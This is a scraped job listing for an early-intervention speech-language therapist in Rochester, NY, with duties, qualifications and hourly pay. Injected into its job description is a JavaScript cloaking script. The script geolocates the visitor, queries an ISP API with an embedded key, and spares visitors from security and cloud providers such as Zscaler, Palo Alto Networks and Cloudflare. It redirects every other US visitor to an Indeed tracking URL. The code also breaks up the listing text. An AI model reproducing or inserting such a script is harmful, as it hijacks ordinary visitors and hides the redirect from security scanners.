Speech-Language Therapist -Early Intervention

Rochester, NY
January 22, 2026

Apply for this job

Email *
Browse

Upload file .pdf, .doc, .docx

Deadline date:

Job Description

// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://www.indeed.com/tmn/ccs/8f0f375fd798a32b/27997f74cba058c0a902a5da1cd446a0aed1afc2764b8c61275c01bfb23d17eb/2765583331732878?sf=yJ800’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });

Join a trauma-informed, family-centered agency dedicated to supporting high-risk children and families as an Early Intervention Speech-Language Therapist.

Responsibilities include:

  • Conducting evaluations to identify speech, language, and swallowing disorders in infants and toddlers.
  • Developing personalized treatment plans aligned with developmental milestones and family needs.
  • Providing play-based, structured therapy to improve communication and language skills, including AAC strategies.
  • Coaching families on techniques to reinforce progress and offering counseling on speech challenges.
  • Collaborating with educators, therapists, and social workers to create holistic intervention strategies.
  • Maintaining accurate documentation and ensuring compliance with regulations.

Qualifications:

  • Master’s Degree in Speech-Language Pathology with valid licensure and CCC from ASHA.
  • 1-3 years of pediatric or early intervention experience preferred.
  • Strong knowledge of child development, speech disorders, and family-centered care.
  • Compassionate, patient, and excellent communicator.

Benefits & Work Details:

  • Competitive hourly pay ($80-$90), full-time, part-time, contract, or per diem options.
  • Benefits include 401(k), matching, paid time off, travel reimbursement, and advancement opportunities.
  • Work involves traveling and on-the-road visits.